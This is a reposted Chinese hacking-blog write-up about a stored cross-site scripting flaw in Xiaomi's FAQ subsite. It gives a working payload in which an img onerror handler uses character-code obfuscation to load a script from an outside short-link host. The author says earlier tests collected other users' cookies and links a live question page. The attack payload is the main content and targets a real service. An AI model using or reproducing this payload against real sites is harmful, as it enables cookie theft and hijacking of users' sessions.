记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

小米某分站存储型xss(可获取用户cookie)

2013-10-21 16:20

http://faq.xiaomi.cn/

来到小米知识库

发现可以提问问题和回答问题

编辑器 还是那么简洁

偷学gainover牛检测编辑器的方法 。发现img标签过滤不完全。



用firebug编辑html内容,

输入
<title><img a="</title><img/src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,122,84,90,75,108,85,87);document.body.appendChild(window.s)})()//>">

嗯,没过虑。



这是上次测试获取到的cookies

 



http://faq.xiaomi.cn/q-20588.html

 

这次的只有我自己访问了

所以不截图了。

 

记得我们的约定哦nice

知识来源: www.2cto.com/Article/201310/251485.html

阅读:111964 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“小米某分站存储型xss(可获取用户cookie)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云